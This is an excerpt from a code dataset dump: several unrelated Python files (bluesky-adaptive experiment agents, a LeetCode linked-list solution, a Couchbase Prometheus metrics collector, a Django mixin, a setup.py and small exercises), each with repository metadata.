data_keys = infer_data_keys(doc)\n self._compose_descriptor_bundles[stream] = self._compose_run_bundle.compose_descriptor(\n name=stream, data_keys=data_keys\n )\n self.agent_catalog.v1.insert(\"descriptor\", self._compose_descriptor_bundles[stream].descriptor_doc)\n\n t = ttime.time()\n event_doc = self._compose_descriptor_bundles[stream].compose_event(\n data=doc, timestamps={k: t for k in doc}, uid=uid\n )\n self.agent_catalog.v1.insert(\"event\", event_doc)\n\n return event_doc[\"uid\"]\n\n def _add_to_queue(\n self, next_points, uid, re_manager=None, position: Optional[Union[int, Literal[\"front\", \"back\"]]] = None\n ):\n \"\"\"\n Adds a single set of points to the queue as bluesky plans\n\n Parameters\n ----------\n next_points : Iterable\n New points to measure\n uid : str\n re_manager : Optional[bluesky_queueserver_api.api_threads.API_Threads_Mixin]\n Defaults to self.re_manager\n position : Optional[Union[int, Literal['front', 'back']]]\n Defaults to self.queue_add_position\n\n Returns\n -------\n\n \"\"\"\n for point in next_points:\n plan_name, args, kwargs = self.measurement_plan(point)\n kwargs.setdefault(\"md\", {})\n kwargs[\"md\"].update(self.default_plan_md)\n kwargs[\"md\"][\"agent_ask_uid\"] = uid\n plan = BPlan(\n plan_name,\n *args,\n **kwargs,\n )\n if re_manager is None:\n re_manager = self.re_manager\n r = re_manager.item_add(plan, pos=self.queue_add_position if position is None else position)\n logger.debug(f\"Sent http-server request for point {point}\\n.\" f\"Received reponse: {r}\")\n return\n\n def _check_queue_and_start(self):\n \"\"\"\n If the queue runs out of plans, it will stop.\n That is, adding a plan to an empty queue will not run the plan.\n This will not be an issue when there are many agents adding plans to a queue.\n Giving agents the autonomy to start the queue is a risk that will be mitigated by\n only allowing the beamline scientists to open and close the environment.\n A queue cannot be started in a closed environment.\n \"\"\"\n status = self.re_manager.status(reload=True)\n if (\n status[\"items_in_queue\"] == 1\n and status[\"worker_environment_exists\"] is True\n and status[\"manager_state\"] == \"idle\"\n ):\n self.re_manager.queue_start()\n logger.info(\"Agent is starting an idle queue with exactly 1 item.\")\n\n def _ask_and_write_events(\n self, batch_size: int, ask_method: Optional[Callable] = None, stream_name: Optional[str] = \"ask\"\n ):\n \"\"\"Private ask method for consistency across calls and changes to docs streams.\n\n Parameters\n ----------\n batch_size : int\n Size of batch passed to ask\n ask_method : Optional[Callable]\n self.ask, or self.subject_ask, or some target ask function.\n Defaults to self.ask\n stream_name : Optional[str]\n Name for ask stream corresponding to `ask_method`. 
'ask', 'subject_ask', or other.\n Defaults to 'ask'\n\n Returns\n -------\n next_points : list\n Next points to be sent to adjudicator or queue\n uid : str\n \"\"\"\n if ask_method is None:\n ask_method = self.ask\n docs, next_points = ask_method(batch_size)\n uid = str(uuid.uuid4())\n for batch_idx, (doc, next_point) in enumerate(zip(docs, next_points)):\n doc[\"suggestion\"] = next_point\n doc[\"batch_idx\"] = batch_idx\n doc[\"batch_size\"] = len(next_points)\n self._write_event(stream_name, doc, uid=f\"{uid}/{batch_idx}\")\n return next_points, uid\n\n def add_suggestions_to_queue(self, batch_size: int):\n \"\"\"Calls ask, adds suggestions to queue, and writes out events.\n This will create one event for each suggestion.\n \"\"\"\n next_points, uid = self._ask_and_write_events(batch_size)\n logger.info(f\"Issued ask and adding to the queue. {uid}\")\n self._add_to_queue(next_points, uid)\n self._check_queue_and_start() # TODO: remove this and encourage updated qserver functionality\n\n def _create_suggestion_list(self, points: Sequence, uid: str, measurement_plan: Optional[Callable] = None):\n \"\"\"Create suggestions for adjudicator\"\"\"\n suggestions = []\n for point in points:\n plan_name, args, kwargs = (\n self.measurement_plan(point) if measurement_plan is None else measurement_plan(point)\n )\n kwargs.setdefault(\"md\", {})\n kwargs[\"md\"].update(self.default_plan_md)\n kwargs[\"md\"][\"agent_ask_uid\"] = uid\n suggestions.append(\n Suggestion(\n ask_uid=uid,\n plan_name=plan_name,\n plan_args=args,\n plan_kwargs=kwargs,\n )\n )\n return suggestions\n\n def generate_suggestions_for_adjudicator(self, batch_size: int):\n \"\"\"Calls ask, sends suggestions to adjudicator, and writes out events.\n This will create one event for each suggestion.\"\"\"\n next_points, uid = self._ask_and_write_events(batch_size)\n logger.info(f\"Issued ask and sending to the adjudicator. {uid}\")\n suggestions = self._create_suggestion_list(next_points, uid)\n msg = AdjudicatorMsg(\n agent_name=self.instance_name,\n suggestions_uid=str(uuid.uuid4()),\n suggestions={self.endstation_key: suggestions},\n )\n self.kafka_producer(ADJUDICATOR_STREAM_NAME, msg.dict())\n\n def generate_report(self, **kwargs):\n doc = self.report(**kwargs)\n uid = self._write_event(\"report\", doc)\n logger.info(f\"Issued report request and writing event. {uid}\")\n\n @staticmethod\n def trigger_condition(uid) -> bool:\n return True\n\n def _tell(self, uid):\n \"\"\"Private tell to encapsulate the processing of a uid.\n This allows the user tell to just consume an independent and dependent variable.\n\n Parameters\n ----------\n uid : str\n Unique key to grab from Tiled.\n \"\"\"\n run = self.exp_catalog[uid]\n try:\n independent_variable, dependent_variable = self.unpack_run(run)\n except KeyError as e:\n logger.warning(f\"Ignoring key error in unpack for data {uid}:\\n {e}\")\n return\n logger.debug(\"Telling agent about some new data.\")\n doc = self.tell(independent_variable, dependent_variable)\n doc[\"exp_uid\"] = uid\n self._write_event(\"tell\", doc)\n self.tell_cache.append(uid)\n\n def _on_stop_router(self, name, doc):\n \"\"\"Document router that runs each time a stop document is seen.\"\"\"\n if name != \"stop\":\n return\n\n uid = doc[\"run_start\"]\n if not self.trigger_condition(uid):\n logger.debug(\n f\"New data detected, but trigger condition not met. 
The agent will ignore this start doc: {uid}\"\n )\n return\n\n # Tell\n logger.info(f\"New data detected, telling the agent about this start doc: {uid}\")\n self._tell(uid)\n\n # Report\n if self.report_on_tell:\n self.generate_report(**self.default_report_kwargs)\n\n # Ask\n if self.ask_on_tell:\n if self._direct_to_queue:\n self.add_suggestions_to_queue(1)\n else:\n self.generate_suggestions_for_adjudicator(1)\n\n def tell_agent_by_uid(self, uids: Iterable):\n \"\"\"Give an agent an iterable of uids to learn from.\n This is an optional behavior for priming an agent without a complete restart.\"\"\"\n logger.info(\"Telling agent list of uids\")\n for uid in uids:\n logger.info(f\"Telling agent about start document{uid}\")\n self._tell(uid)\n\n def start(self, ask_at_start=False):\n \"\"\"Starts kakfka listener in background thread\n\n Parameters\n ----------\n ask_at_start : bool, optional\n Whether to ask for a suggestion immediately, by default False\n \"\"\"\n logger.debug(\"Issuing Agent start document and starting to listen to Kafka\")\n self._compose_run_bundle = compose_run(metadata=self.metadata)\n self.agent_catalog.v1.insert(\"start\", self._compose_run_bundle.start_doc)\n logger.info(f\"Agent name={self._compose_run_bundle.start_doc['agent_name']}\")\n logger.info(f\"Agent start document uuid={self._compose_run_bundle.start_doc['uid']}\")\n if ask_at_start:\n self.add_suggestions_to_queue(1)\n self._kafka_thread = threading.Thread(target=self.kafka_consumer.start, name=\"agent-loop\", daemon=True)\n self._kafka_thread.start()\n\n def stop(self, exit_status=\"success\", reason=\"\"):\n logger.debug(\"Attempting agent stop.\")\n stop_doc = self._compose_run_bundle.compose_stop(exit_status=exit_status, reason=reason)\n self.agent_catalog.v1.insert(\"stop\", stop_doc)\n self.kafka_producer.flush()\n self.kafka_consumer.stop()\n logger.info(\n f\"Stopped agent with exit status {exit_status.upper()}\"\n f\"{(' for reason: ' + reason) if reason else '.'}\"\n )\n\n def close_and_restart(self, *, clear_tell_cache=False, retell_all=False, reason=\"\"):\n \"\"\"Utility for closing and restarting an agent with the same name.\n This is primarily for methods that change the hyperparameters of an agent on the fly,\n but in doing so may change the shape/nature of the agent document stream. 
This will\n keep the documents consistent between hyperparameters as individual BlueskyRuns.\n\n Parameters\n ----------\n clear_tell_cache : bool, optional\n Clears the cache of data the agent has been told about, by default False.\n This is useful for a clean slate.\n retell_all : bool, optional\n Resets the cache and tells the agent about all previous data, by default False.\n This can be useful if the agent has not retained knowledge from previous tells.\n reason : str, optional\n Reason for closing and restarting the agent, to be recorded to logs, by default \"\"\n \"\"\"\n self.stop(reason=f\"Close and Restart: {reason}\")\n if clear_tell_cache:\n self.tell_cache = list()\n elif retell_all:\n uids = copy.copy(self.tell_cache)\n self.tell_cache = list()\n self.tell_agent_by_uid(uids)\n self.start()\n\n def signal_handler(self, signal, frame):\n self.stop(exit_status=\"abort\", reason=\"forced exit ctrl+c\")\n sys.exit(0)\n\n def _register_property(self, name: str, property_name: Optional[str] = None, **kwargs):\n \"\"\"Wrapper to register property to bluesky-adaptive server instead of attribute or variable.\n\n Parameters\n ----------\n name : str\n Name by which the variable is accessible through the REST API. The PV name is generated by converting\n the variable names to upper-case letters. The name does not need to match the actual name of\n the variable used in the code. The name should be selected so that it could be conveniently used\n in the API.\n property_name : Optional[str]\n The name of a class property, by default the same name used in the REST API.\n \"\"\"\n\n [kwargs.pop(key, None) for key in (\"getter\", \"setter\")] # Cannot pass getter/setter\n property_name = name if property_name is None else property_name\n register_variable(\n name,\n getter=lambda: getattr(self.__class__, property_name).fget(self),\n setter=lambda x: getattr(self.__class__, property_name).fset(self, x),\n **kwargs,\n )\n\n def _register_method(self, name, method_name=None, **kwargs):\n \"\"\"Wrapper to register generic method to bluesky-adaptive server instead of attribute or variable.\n To call the method, pass the setter a json with of form:\n {value: [[args,],\n {kwargs}]}\n This is a temporary solution that makes use of only the setter API and not a dedicated interface.\n This will be deprecated in the future.\n\n Parameters\n ----------\n name : str\n Name by which the variable is accessible through the REST API. The PV name is generated by converting\n the variable names to upper-case letters. The name does not need to match the actual name of\n the variable used in the code. 
The name should be selected so that it could be conveniently used\n in the API.\n method_name : Optional[str]\n The name of the method, by default the same name used in the REST API.\n \"\"\"\n [kwargs.pop(key, None) for key in (\"getter\", \"setter\")] # Cannot pass getter/setter\n method_name = name if method_name is None else method_name\n if not isinstance(getattr(self, method_name), Callable):\n raise TypeError(f\"Method {method_name} must be a callable function.\")\n register_variable(name, setter=lambda value: start_task(getattr(self, method_name)(*value[0], **value[1])))\n\n def server_registrations(self) -> None:\n \"\"\"\n Method to generate all server registrations during agent initialization.\n This method can be used in subclasses, to override or extend the default registrations.\n \"\"\"\n self._register_method(\"generate_report\")\n self._register_method(\"add_suggestions_to_queue\")\n self._register_method(\"tell_agent_by_uid\")\n self._register_property(\"queue_add_position\", pv_type=\"str\")\n self._register_property(\"ask_on_tell\", pv_type=\"bool\")\n self._register_property(\"report_on_tell\", pv_type=\"bool\")\n\n @staticmethod\n def qserver_from_host_and_key(host: str, key: str):\n \"\"\"Convenience method to prouduce RE Manager object to manage communication with Queue Server.\n This is one of several paradigms for communication, albeit a common one.\n See bluesky_queueserver_api documentation for more details.\n\n\n Parameters\n ----------\n host : str\n URI for host of HTTP Server\n key : str\n Authorization key for HTTP Server API\n\n Returns\n -------\n qserver : bluesky_queueserver_api.api_threads.API_Threads_Mixin\n \"\"\"\n from bluesky_queueserver_api.http import REManagerAPI\n\n qserver = REManagerAPI(http_server_uri=host)\n qserver.set_authorization_key(api_key=key)\n return qserver\n\n @classmethod\n def from_config_kwargs(\n cls,\n kafka_group_id: str,\n kafka_bootstrap_servers: str,\n kafka_consumer_config: dict,\n kafka_producer_config: dict,\n publisher_topic: str,\n subscripion_topics: List[str],\n data_profile_name: str,\n agent_profile_name: str,\n qserver_host: str,\n qserver_api_key: str,\n **kwargs,\n ):\n \"\"\"Convenience method for producing an Agent from keyword arguments describing the\n Kafka, Tiled, and Qserver setup.\n Assumes tiled is loaded from profile, and the REManagerAPI is based on the http api.\n\n Parameters\n ----------\n kafka_group_id : str\n Required string identifier for the consumer's Kafka Consumer group.\n kafka_bootstrap_servers : str\n Comma-delimited list of Kafka server addresses as a string\n such as ``'broker1:9092,broker2:9092,127.0.0.1:9092'``\n kafka_consumer_config : dict\n Override default configuration or specify additional configuration\n options to confluent_kafka.Consumer.\n kafka_producer_config : dict\n Override default configuration or specify additional configuration\n options to confluent_kafka.Producer.\n publisher_topic : str\n Existing topic to publish agent documents to.\n subscripion_topics : List[str]\n List of existing_topics as strings such as [\"topic-1\", \"topic-2\"]. These should be\n the sources of the Bluesky stop documents that trigger ``tell`` and agent directives.\n data_profile_name : str\n Tiled profile name to serve as source of data (BlueskyRuns) for the agent.\n agent_profile_name : str\n Tiled profile name to serve as storage for the agent documents.\n qserver_host : str\n Host to POST requests to. 
Something akin to 'http://localhost:60610'\n qserver_api_key : str\n Key for API security.\n kwargs : dict\n Additional keyword arguments for init\n \"\"\"\n from bluesky_queueserver_api.http import REManagerAPI\n from tiled.client import from_profile\n\n kafka_consumer = AgentConsumer(\n topics=subscripion_topics,\n bootstrap_servers=kafka_bootstrap_servers,\n group_id=kafka_group_id,\n consumer_config=kafka_consumer_config,\n )\n kafka_producer = Publisher(\n topic=publisher_topic,\n bootstrap_servers=kafka_bootstrap_servers,\n key=\"\",\n producer_config=kafka_producer_config,\n )\n tiled_data_node = from_profile(data_profile_name)\n tiled_agent_node = from_profile(agent_profile_name)\n\n re_manager = REManagerAPI(http_server_uri=qserver_host)\n re_manager.set_authorization_key(api_key=qserver_api_key)\n\n if \"metadata\" in kwargs:\n kwargs[\"metadata\"].update(\n dict(tiled_data_profile=data_profile_name, tiled_agent_profile=agent_profile_name)\n )\n\n return cls.__init__(\n kafka_consumer=kafka_consumer,\n kafka_producer=kafka_producer,\n tiled_data_node=tiled_data_node,\n tiled_agent_node=tiled_agent_node,\n qserver=re_manager,\n **kwargs,\n )\n\n\nclass MonarchSubjectAgent(Agent, ABC):\n # Drive a beamline. On stop doc check. By default manual trigger.\n\n def __init__(\n self,\n *args,\n subject_qserver: API_Threads_Mixin,\n subject_kafka_producer: Optional[Publisher] = None,\n subject_endstation_key: Optional[str] = \"\",\n **kwargs,\n ):\n \"\"\"Abstract base class for a MonarchSubject agent. These agents only consume documents from one\n (Monarch) source, and can dictate the behavior of a different (Subject) queue.\n This can be useful in a multimodal measurement where\n one measurement is very fast and the other is very slow: after some amount of data collection on the fast\n measurement, the agent can dictate that the slow measurement probe what it considers as interesting. The\n agent maintains the functionality of a regular Agent, and adds plans to the Monarch queue.\n\n By default, the Subject is only directed when manually triggered by the agent server or by\n a kafka directive. If an automated approach to asking the subject is required,\n ``subject_ask_condition`` must be overriden. This is commonly done by using a wall-clock interval,\n and/or a model confidence trigger.\n\n Children of MonarchSubjectAgent must implment the following, through direct inheritence or mixin classes:\n Experiment specific:\n - measurement_plan\n - unpack_run\n - subject_measurement_plan\n Agent specific:\n - tell\n - ask\n - subject_ask\n - report (optional)\n - name (optional)\n\n Parameters\n ----------\n subject_qserver : API_Threads_Mixin\n Object to manage communication with the Subject Queue Server\n subject_kafka_producer : Optional[Publisher]\n Bluesky Kafka publisher to produce document stream of agent actions to Adjudicators\n subject_endstation_key : Optional[str]\n Optional string that is needed for Adjudicator functionality. This keys the qserver API instance to\n a particular endstation. 
This way child Agents can maintain multiple queues for different unit ops.\n For example, this could be a beamline three letter acronym or other distinct key.\n \"\"\"\n super().__init__(**kwargs)\n self.subject_re_manager = subject_qserver\n self.subject_kafka_producer = subject_kafka_producer\n self.subject_endstation_key = subject_endstation_key\n\n @abstractmethod\n def subject_measurement_plan(self, point: ArrayLike) -> Tuple[str, List, dict]:\n \"\"\"Details for subject plan.\n Fetch the string name of a registered plan, as well as the positional and keyword\n arguments to pass that plan.\n\n Args/Kwargs is a common place to transform relative into absolute motor coords, or\n other device specific parameters.\n\n Parameters\n ----------\n point : ArrayLike\n Next point to measure using a given plan\n\n Returns\n -------\n plan_name : str\n plan_args : List\n List of arguments to pass to plan from a point to measure.\n plan_kwargs : dict\n Dictionary of keyword arguments to pass the plan, from a point to measure.\n \"\"\"\n ...\n\n @abstractmethod\n def subject_ask(self, batch_size: int) -> Tuple[Sequence[Dict[str, ArrayLike]], Sequence[ArrayLike]]:\n \"\"\"\n Ask the agent for a new batch of points to measure on the subject queue.\n\n Parameters\n ----------\n batch_size : int\n Number of new points to measure\n\n Returns\n -------\n docs : Sequence[dict]\n Documents of key metadata from the ask approach for each point in next_points.\n Must be length of batch size.\n next_points : Sequence[ArrayLike]\n Sequence of independent variables of length batch size\n\n \"\"\"\n ...\n\n def subject_ask_condition(self):\n \"\"\"Option to build in a trigger method that is run on using the document router subcription.\n\n Returns\n -------\n bool\n \"\"\"\n return False\n\n def add_suggestions_to_subject_queue(self, batch_size: int):\n \"\"\"Calls ask, adds suggestions to queue, and writes out event\"\"\"\n next_points, uid = self._ask_and_write_events(batch_size, self.subject_ask, \"subject_ask\")\n logger.info(\"Issued ask to subject and adding to the queue. {uid}\")\n self._add_to_queue(next_points, uid, re_manager=self.subject_re_manager, position=\"front\")\n\n def _on_stop_router(self, name, doc):\n ret = super()._on_stop_router(name, doc)\n if name != \"stop\":\n return ret\n\n if self.subject_ask_condition():\n if self._direct_to_queue:\n self.add_suggestions_to_subject_queue(1)\n else:\n raise NotImplementedError\n\n def generate_suggestions_for_adjudicator(self, batch_size: int):\n next_points, uid = self._ask_and_write_events(batch_size, self.subject_ask, \"subject_ask\")\n logger.info(f\"Issued subject ask and sending to the adjudicator. 
{uid}\")\n suggestions = self._create_suggestion_list(next_points, uid, self.subject_measurement_plan)\n msg = AdjudicatorMsg(\n agent_name=self.instance_name,\n suggestions_uid=str(uuid.uuid4()),\n suggestions={self.subject_endstation_key: suggestions},\n )\n self.subject_kafka_producer(ADJUDICATOR_STREAM_NAME, msg.dict())\n\n def server_registrations(self) -> None:\n super().server_registrations()\n self._register_method(\"add_suggestions_to_subject_queue\")\n","repo_name":"bluesky/bluesky-adaptive","sub_path":"bluesky_adaptive/agents/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":43242,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18987403640","text":"from List import ListNode, head1\n#\n#\n# def reorderList(head):\n# # if head is None or head.next is None:\n# # return head\n# # length = 0\n# # index = head\n# # while index is not None:\n# # index = index.next\n# # length += 1\n# # left, right, index = [], [], head\n# # left_length = int((length+1) / 2)\n# # for i in range(left_length):\n# # left.append(index.val)\n# # index = index.next\n# # while index is not None:\n# # right.append(index.val)\n# # index = index.next\n# # right.reverse()\n# # res = ListNode(0)\n# # index = res\n# # i = 0\n# # while length > 1:\n# # index.next = ListNode(left[i])\n# # index = index.next\n# # index.next = ListNode(right[i])\n# # index = index.next\n# # length -= 2\n# # i += 1\n# # if length == 1:\n# # index.next = ListNode(left[i])\n# # return res.next\n# slow, fast = head, head\n# while fast.next is not None and fast.next.next is not None:\n# slow = slow.next\n# fast = fast.next.next\n# i = slow\n# slow = slow.next\n# i.next = None\n# slow = reverseList(slow)\n#\n# p1=head # rejoin 2 parts together\n# p2=slow\n# while p2:\n# t1=p1.next\n# p1.next=p2\n# t2=p2.next\n# p2.next=t1\n# p1=t1\n# p2=t2\n#\n# def reverseList(head):\n#\n# # if head is None or head.next is None:\n# # return head\n# # rest = reverseList(head.next)\n# # res = rest\n# # while rest.next is not None:\n# # rest = rest.next\n# # rest.next = head\n# # head.next = None\n# # return res\n# if head is None or head.next is None:\n# return head\n# if head.next.next is None:\n# index = head\n# index = index.next\n# index.next = head\n# head.next = None\n# return index\n# pre, index, after = head, head.next, head.next.next\n# while after.next is not None:\n# index.next = pre\n# pre = index\n# index = after\n# after = after.next\n# head.next = None\n# index.next = pre\n# after.next = index\n# return after\n#\n#\n# reorderList(h1)\n# while h1 is not None:\n# print(h1.val)\n# h1 = h1.next\n#\n#\n# # Definition for singly-linked list.\n# # class ListNode(object):\n# # def __init__(self, x):\n# # self.val = x\n# # self.next = None\n#\n# class Solution(object):\n# def reorderList(self, head):\n# \"\"\"\n# :type head: ListNode\n# :rtype: void Do not return anything, modify head in-place instead.\n# \"\"\"\n# if head is None or head.next is None or head.next.next is None:\n# head=head\n# else:\n#\n# slow=fast=head # two parts\n# while fast.next and fast.next.next:\n# slow=slow.next\n# fast=fast.next.next\n#\n# head2=slow.next\n# slow.next=None\n#\n# dummy=ListNode(0) # reverse 2nd part\n# dummy.next=head2\n# p=head2.next\n# head2.next=None\n# while p:\n# tmp=p\n# p=p.next\n# tmp.next=dummy.next\n# dummy.next=tmp\n# head2=dummy.next\n#\n# p1=head # rejoin 2 parts together\n# p2=head2\n# while p2:\n# t1=p1.next\n# p1.next=p2\n# t2=p2.next\n# p2.next=t1\n# p1=t1\n# 
p2=t2\n\n# Definition for singly-linked list.\n\n\nclass Solution(object):\n\n def reorderList(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: void Do not return anything, modify head in-place instead.\n \"\"\"\n if not head or not head.next or not head.next.next:\n return\n else:\n slow, fast = head, head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n h1 = slow.next\n slow.next = None\n pre = None\n now = h1\n while now:\n nx = now.next\n now.next = pre\n pre = now\n now = nx\n h1 = pre\n h2 = head\n # h2.prt()\n # print\n # h1.prt()\n nx2 = None\n nx1 = None\n while h1:\n nx2 = h2.next\n h2.next = h1\n nx1 = h1.next\n h1.next = nx2\n h2 = nx2\n h1 = nx1\n\n\nSolution().reorderList(head1)\nhead1.prt()\n\n\n\n","repo_name":"gitttttt/lc","sub_path":"q143.py","file_name":"q143.py","file_ext":"py","file_size_in_byte":4786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10201360519","text":"import sys\n\nif sys.version_info[0] == 3:\n from .cb_utilities import *\nelse:\n from cb_utilities import *\n\n# class view():\n# def __init__(self):\n# self.service_identifier = None\n\ndef _get_cluster(url, user, passwrd, node_list=[]):\n '''Starts by getting the cluster definition, then creates a node list, then gets metrics for\n the cluster from each node'''\n result = {}\n result['metrics'] = []\n service_nodes = {}\n service_nodes['kv'] = []\n service_nodes['index'] = []\n service_nodes['n1ql'] = []\n service_nodes['eventing'] = []\n service_nodes['fts'] = []\n service_nodes['cbas'] = []\n service_nodes['thisNode'] = \"\"\n current_url = \"\"\n nodes = []\n\n auth = basic_authorization(user, passwrd)\n\n if len(node_list) > 0:\n pass\n else:\n node_list.append(url)\n\n for uri in node_list:\n try:\n _url = \"http://{}:8091/pools/default\".format(uri.split(\":\")[0])\n stats = rest_request(auth, _url)\n current_url = value_to_string(current_url)\n break\n except Exception as e:\n return (result)\n\n for record in stats:\n if record == \"nodes\":\n for node in stats[record]:\n nodes.append(node['hostname'])\n if \"kv\" in node['services']:\n service_nodes['kv'].append(node['hostname'])\n\n if \"index\" in node['services']:\n service_nodes['index'].append(node['hostname'])\n\n if \"n1ql\" in node['services']:\n service_nodes['n1ql'].append(node['hostname'])\n\n if \"eventing\" in node['services']:\n service_nodes['eventing'].append(node['hostname'])\n\n if \"fts\" in node['services']:\n service_nodes['fts'].append(node['hostname'])\n\n if \"cbas\" in node['services']:\n service_nodes['cbas'].append(node['hostname'])\n # if the thisNode attribute is set, save the hostname\n if \"thisNode\" in node.keys() and node['thisNode'] == True:\n service_nodes['thisNode'] = node['hostname']\n result['serviceNodes'] = service_nodes\n result['nodeList'] = nodes\n\n elif record in [\"rebalanceStatus\", \"balanced\"]:\n if record == \"rebalanceStatus\":\n if stats['rebalanceStatus'] == \"none\":\n result['metrics'].append(\n \"{} {{type=\\\"cluster\\\"}} {}\".format(\n snake_caseify(record), 0))\n else:\n result['metrics'].append(\n \"{} {{type=\\\"cluster\\\"}} {}\".format(\n snake_caseify(record), 1))\n elif record == \"balanced\":\n if stats[record]:\n result['metrics'].append(\n \"{} {{type=\\\"cluster\\\"}} {}\".format(\n snake_caseify(record), 0))\n else:\n result['metrics'].append(\n \"{} {{type=\\\"cluster\\\"}} {}\".format(\n snake_caseify(record), 1))\n\n elif record in [\"autoCompactionSettings\"]:\n for 
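The accepted Solution above depends on a local List module for ListNode and prt(). The same three-phase algorithm (find the middle, reverse the back half, interleave) is restated self-contained below for reference.

class ListNode:
    def __init__(self, val=0, nxt=None):
        self.val = val
        self.next = nxt

def reorder_list(head):
    if not head or not head.next:
        return
    # 1. slow stops at the end of the first half.
    slow, fast = head, head
    while fast.next and fast.next.next:
        slow, fast = slow.next, fast.next.next
    # 2. Detach and reverse the second half in place.
    prev, cur = None, slow.next
    slow.next = None
    while cur:
        cur.next, prev, cur = prev, cur, cur.next
    # 3. Interleave; the first half is never shorter than the reversed half.
    first, second = head, prev
    while second:
        tmp1, tmp2 = first.next, second.next
        first.next, second.next = second, tmp1
        first, second = tmp1, tmp2

# Quick check: 1->2->3->4 becomes 1->4->2->3.
head = ListNode(1, ListNode(2, ListNode(3, ListNode(4))))
reorder_list(head)
vals = []
while head:
    vals.append(head.val)
    head = head.next
assert vals == [1, 4, 2, 3]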
compaction_type in stats[record]:\n if compaction_type in [\"databaseFragmentationThreshold\",\n \"viewFragmentationThreshold\"]:\n for _metric in stats[record][compaction_type]:\n try:\n int(stats[record][compaction_type][_metric])\n result['metrics'].append(\n \"{} {{type=\\\"cluster\\\"}} {}\".format(\n snake_caseify(_metric), stats[record][compaction_type][_metric]))\n except Exception as e:\n pass\n elif record in [\"counters\"]:\n for counter in stats[record]:\n result['metrics'].append(\n \"{} {{type=\\\"cluster\\\"}} {}\".format(\n counter, stats[record][counter]))\n\n elif record in [\"storageTotals\"]:\n for storage_type in stats[record]:\n for _metric in stats[record][storage_type]:\n result['metrics'].append(\"{}{} {{type=\\\"cluster\\\"}} {}\".format(\n storage_type, snake_caseify(_metric), stats[record][storage_type][_metric]))\n\n elif record in [\"clusterName\"]:\n result['clusterName'] = stats[record]\n\n elif record in [\"buckets\",\n \"remoteClusters\",\n \"alerts\",\n \"alertsSilenceURL\",\n \"controllers\",\n \"rebalanceProgressUri\",\n \"stopRebalanceUri\",\n \"nodeStatusesUri\",\n \"tasks\",\n \"indexStatusURI\",\n \"checkPermissionsURI\",\n \"serverGroupsUri\",\n \"name\"]:\n pass\n else:\n result['metrics'].append(\n \"{} {{type=\\\"cluster\\\"}} {}\".format(\n snake_caseify(record), stats[record]))\n\n return(result)\n","repo_name":"couchbaselabs/cbprometheus_python","sub_path":"src/application/modules/cb_cluster.py","file_name":"cb_cluster.py","file_ext":"py","file_size_in_byte":5289,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"71397903469","text":"from .signals import object_viewed_signal\n\n\nclass ObjectViewedMixin(object):\n def get_context_data(self, *args, **kwargs):\n context = super(ObjectViewedMixin, self).get_context_data(*args, **kwargs)\n request = self.request\n instance = context.get('object')\n if instance:\n object_viewed_signal.send(instance.__class__, instance=instance, request=request)\n return context","repo_name":"codingforentrepreneurs/eCommerce","sub_path":"src/analytics/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":1459,"dataset":"github-code","pt":"37"} +{"seq_id":"22946967806","text":"from setuptools import setup, find_packages\n\n# reading long description from file\nwith open(\"README.md\", encoding=\"utf-8\") as file:\n long_description = file.read()\n\n\n# specify requirements of your package here\nREQUIREMENTS = [\"pygame\"]\n\n\n# calling the setup function\nsetup(\n name=\"snake\",\n version=\"0.0.1\",\n description=\"A simple snake game\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/douglas-cpp/snake\",\n author=\"Douglas\",\n author_email=\"douglasc.dev@gmail.com\",\n license=\"Apache License 2.0\",\n packages=find_packages(include=[\"snake\"]),\n entry_points={\n \"console_scripts\": [\n \"snake = snake.main:main\",\n ],\n },\n install_requires=REQUIREMENTS,\n keywords=\"game\",\n)\n","repo_name":"douglascdev/snake","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"30700653402","text":"\"\"\"\n有一个已经排好序的数组。现输入一个数,要求按原来的规律将它插入数组中。\n\"\"\"\n\n\ndef insertNumbers(value):\n arrays = [1, 3, 4, 5, 6, 8, 10]\n for i in range(len(arrays)):\n if arrays[i] < int(value) < 
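For reference, the strings assembled by _get_cluster above follow the Prometheus exposition format. snake_caseify and rest_request live in the local cb_utilities module, so the helper below is only an assumed stand-in to make the output concrete.

import re

def snake_caseify(name):
    # Assumed stand-in for the cb_utilities helper: camelCase -> snake_case.
    return re.sub(r"(?<!^)(?=[A-Z])", "_", name).lower()

# A cluster-level gauge as emitted above:
line = "{} {{type=\"cluster\"}} {}".format(snake_caseify("rebalanceStatus"), 0)
print(line)  # rebalance_status {type="cluster"} 0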
arrays[i + 1]:\n # 说实话我没看懂\n arrays.insert(i + 1, value)\n print(arrays)\n\n\ninsertNumbers(2)\n","repo_name":"walkingtyphoon/Python-workspace","sub_path":"network/practice/Basic/Demo02/practice05.py","file_name":"practice05.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1950493078","text":"import os\nimport argparse\nfrom settings.hp_grid import HP_MINIBATCH_SIZE\nimport pandas as pd\nfrom settings.default import QUANDL_TICKERS\nfrom settings.fixed_params import MODLE_PARAMS\nfrom mom_trans.backtest import run_all_windows\nimport numpy as np\nfrom functools import reduce\n\n# define the asset class of each ticker here - for this example we have not done this\nTEST_MODE = False\nASSET_CLASS_MAPPING = dict(zip(QUANDL_TICKERS, [\"COMB\"] * len(QUANDL_TICKERS)))\nTRAIN_VALID_RATIO = 0.90\nTIME_FEATURES = False\nFORCE_OUTPUT_SHARPE_LENGTH = None\nEVALUATE_DIVERSIFIED_VAL_SHARPE = True\nNAME = \"experiment_quandl_100assets\"\n\n\ndef main(\n experiment: str,\n train_start: int,\n test_start: int,\n test_end: int,\n test_window_size: int,\n num_repeats: int,\n):\n if experiment == \"LSTM\":\n architecture = \"LSTM\"\n lstm_time_steps = 63\n changepoint_lbws = None\n elif experiment == 